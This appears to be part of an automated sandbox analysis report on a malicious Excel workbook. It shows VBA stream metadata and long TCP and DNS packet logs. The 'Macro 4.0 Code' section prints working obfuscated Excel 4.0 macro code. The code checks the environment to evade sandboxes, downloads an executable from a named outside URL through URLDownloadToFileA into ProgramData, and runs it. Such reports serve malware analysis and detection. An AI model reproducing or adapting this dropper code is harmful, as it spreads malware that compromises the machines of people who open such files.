                                                                                                                                                            Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 48 50 20 50 43 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 501
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Stream Size:501
                                                                                                                                                            Entropy:5.22430114012
                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                            Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F e u i l 1 / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F 7 F 5 5 B 5 6 A 5 B A 9 8 B E 9 8 B E 9 C C 2 9 C C 2 " . . D P B = " E E E C 4 2 6 F C E 9 1 D 8 A E D 8 A E 2 7 5 2
                                                                                                                                                            Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 65 75 69 6c 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 56 42
                                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:62
                                                                                                                                                            Entropy:3.11998328335
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . F e u i l 1 . F . e . u . i . l . 1 . . . . .
                                                                                                                                                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 46 65 75 69 6c 31 00 46 00 65 00 75 00 69 00 6c 00 31 00 00 00 00 00
                                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2453
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:2453
                                                                                                                                                            Entropy:3.93667032984
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . .
                                                                                                                                                            Data Raw:cc 61 af 00 00 01 00 ff 0c 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: VAX-order 68k Blit mpx/mux executable, Stream Size: 522
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                            File Type:VAX-order 68k Blit mpx/mux executable
                                                                                                                                                            Stream Size:522
                                                                                                                                                            Entropy:6.33446971204
                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . K . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                                            Data Raw:01 06 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 4b fc ca 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                            Macro 4.0 Code

                                                                                                                                                            ;;;;;;;;;;;;;;;"=IF(GET.WORKSPACE(1+18);;CLOSE(TRUE))";;;;"=IF(GET.WORKSPACE(30+12);;CLOSE(TRUE))";;;;;;;;"=IF(ISNUMBER(SEARCH(""32"";GET.WORKSPACE(1)));GOTO(B126);GOTO(C126))";;;=;;"=CHAR(67)&CHAR(65)&CHAR(76)&CHAR(76)&""(""""ur""""&CHAR(108)&""""mon"""",""""UR""""&CHAR(76)&""""Down""""&CHAR(108)&""""oadToFi""""&CHAR(108)&""""eA"""",""""JJCCJJ"""",0,CHAR(104)&""""ttps://www.seyranikenger.com.tr/mensajeria_system.exe"""",""""C:\"""" & Char(80) & Char(82) & """"OGRAMDATA\a.""""&CHAR(101)&""""xe"""")""";;;;"EXEC(""C:\""&CHAR(80)&CHAR(82)&""OGRAMDATA\a.""&CHAR(101)&""xe"")";;;;"=CHAR(67)&CHAR(65)&CHAR(76)&CHAR(76)&""(""""ur""""&CHAR(108)&""""mon"""",""""UR""""&CHAR(76)&""""Down""""&CHAR(108)&""""oadToFi""""&CHAR(108)&""""eA"""",""""BBCCBB"""",0,CHAR(104)&""""ttps://www.seyranikenger.com.tr/mensajeria_system.exe"""",""""C:\"""" & Char(80) & Char(82) & """"OGRAMDATA\a.""""&CHAR(101)&""""xe"""")""""=FORMULA.FILL(D123&F123;B127)";"=FORMULA.FILL(D123&F125;C127)";;;;;;;"=FORMULA.FILL(D123&F124;B129)";"=FORMULA.FILL(D123&F124;C129)";;;;;;;;;;;=CLOSE(FALSE);=CLOSE(FALSE);;;;;;;

                                                                                                                                                            Network Behavior

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Feb 22, 2021 20:34:52.639247894 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:52.728754997 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:52.728857040 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:52.729995012 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:52.819730043 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:52.822626114 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:52.822662115 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:52.822681904 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:52.822696924 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:52.822726965 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:52.839371920 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:52.929435968 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:52.929589033 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:52.930550098 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.020528078 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.020565987 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.020591021 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.020612955 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.020631075 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.020633936 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.020654917 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.020658016 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.020677090 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.020698071 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.020699024 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.020720005 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.020729065 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.020742893 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.020764112 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.020798922 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.110246897 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.110290051 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.110332966 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.110340118 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.110371113 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.110384941 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.110419035 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.110430956 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.110510111 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.110551119 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.110583067 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.110600948 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.110618114 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.110632896 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.110657930 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.110672951 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.110698938 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.110718012 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.110749960 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.110795021 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.110797882 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.110821962 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.110833883 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.110846996 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.110874891 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.110893965 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.110915899 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.110929966 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.110955954 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.110987902 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.111020088 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.111049891 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.111092091 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.111099005 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.111129999 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.111176014 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.200699091 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.200731039 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.200748920 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.200766087 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.200792074 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.200838089 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.200843096 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.200896025 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.200896025 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.200912952 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.200930119 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.200939894 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.200947046 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.200982094 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.201030970 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.201036930 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.201057911 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.201075077 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.201091051 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.201093912 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.201109886 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.201124907 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.201129913 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.201142073 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.201194048 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.201199055 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.201216936 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.201234102 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.201250076 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.201252937 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.201309919 CET49731443192.168.2.4185.162.146.6
                                                                                                                                                            Feb 22, 2021 20:34:53.201481104 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.201500893 CET44349731185.162.146.6192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.201518059 CET44349731185.162.146.6192.168.2.4

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Feb 22, 2021 20:34:29.687860012 CET6151653192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:29.739490986 CET53615168.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:29.767420053 CET4918253192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:29.815984011 CET53491828.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:30.263438940 CET5992053192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:30.314961910 CET53599208.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:31.078226089 CET5745853192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:31.080617905 CET5057953192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:31.082081079 CET5170353192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:31.126879930 CET53574588.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:31.130614996 CET53517038.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:31.131963015 CET53505798.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:34.316699028 CET6524853192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:34.365331888 CET53652488.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:34.720675945 CET5372353192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:34.783176899 CET53537238.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:35.302231073 CET6464653192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:35.350928068 CET53646468.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:36.280597925 CET6529853192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:36.329336882 CET53652988.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:36.805571079 CET5912353192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:36.864126921 CET53591238.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:37.923851967 CET5453153192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:37.976875067 CET53545318.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:39.346796989 CET4971453192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:39.397808075 CET53497148.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:40.696451902 CET5802853192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:41.707600117 CET5802853192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:42.722731113 CET5802853192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:42.771193027 CET53580288.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:47.367399931 CET5309753192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:47.418781996 CET53530978.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:48.501813889 CET4925753192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:48.560431004 CET53492578.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:48.929344893 CET6238953192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:48.982388973 CET53623898.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:49.017344952 CET4991053192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:49.106849909 CET53499108.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:50.018461943 CET4991053192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:50.080616951 CET53499108.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:51.020482063 CET4991053192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:51.077636003 CET53499108.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:52.415822029 CET5585453192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:52.524574041 CET6454953192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:52.576081038 CET53645498.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:52.636853933 CET53558548.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.035986900 CET4991053192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:53.093123913 CET53499108.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:53.546662092 CET6315353192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:53.595238924 CET53631538.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:54.636038065 CET5299153192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:54.684721947 CET53529918.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:55.715290070 CET5370053192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:55.766792059 CET53537008.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:56.700356960 CET5172653192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:56.753185987 CET53517268.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:57.155433893 CET4991053192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:57.213876963 CET53499108.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:34:57.856837034 CET5679453192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:34:57.905467033 CET53567948.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:00.789448977 CET5653453192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:00.838532925 CET53565348.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:01.642065048 CET5662753192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:01.693589926 CET53566278.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:02.390264988 CET5662153192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:02.486176968 CET6311653192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:02.495822906 CET53566218.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:02.543293953 CET53631168.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:02.654545069 CET6407853192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:02.705847025 CET53640788.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:03.489864111 CET6480153192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:03.539556980 CET53648018.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:04.643543005 CET6172153192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:04.692197084 CET53617218.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:05.419096947 CET5125553192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:05.470511913 CET53512558.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:24.897155046 CET6152253192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:24.950231075 CET53615228.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:26.430989027 CET5233753192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:26.490880966 CET53523378.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:26.674863100 CET5504653192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:26.723582983 CET53550468.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:45.741672993 CET4961253192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:45.800513983 CET53496128.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:45.854551077 CET4928553192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:45.903126001 CET53492858.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:46.288532972 CET5060153192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:46.339776993 CET53506018.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:55.892837048 CET6087553192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:56.932419062 CET6087553192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:56.989854097 CET53608758.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:56.991533995 CET53608758.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:35:57.158576965 CET5644853192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:35:57.207247972 CET53564488.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:36:04.702212095 CET5917253192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:36:04.763225079 CET53591728.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:36:26.419395924 CET6242053192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:36:27.475675106 CET6242053192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:36:27.662655115 CET53624208.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:36:27.767416954 CET6057953192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:36:27.954674006 CET53605798.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:36:30.208513975 CET5018353192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:36:30.270618916 CET53501838.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:36:30.389144897 CET6153153192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:36:30.446027040 CET53615318.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:36:30.964181900 CET4922853192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:36:31.027055979 CET53492288.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:36:31.684195042 CET5979453192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:36:31.741703987 CET53597948.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:36:32.248416901 CET5591653192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:36:32.308609962 CET53559168.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:36:32.781590939 CET5275253192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:36:32.842658043 CET53527528.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:36:33.457366943 CET6054253192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:36:33.516851902 CET53605428.8.8.8192.168.2.4
                                                                                                                                                            Feb 22, 2021 20:36:34.382621050 CET6068953192.168.2.48.8.8.8
                                                                                                                                                            Feb 22, 2021 20:36:34.444055080 CET53606898.8.8.8192.168.2.4
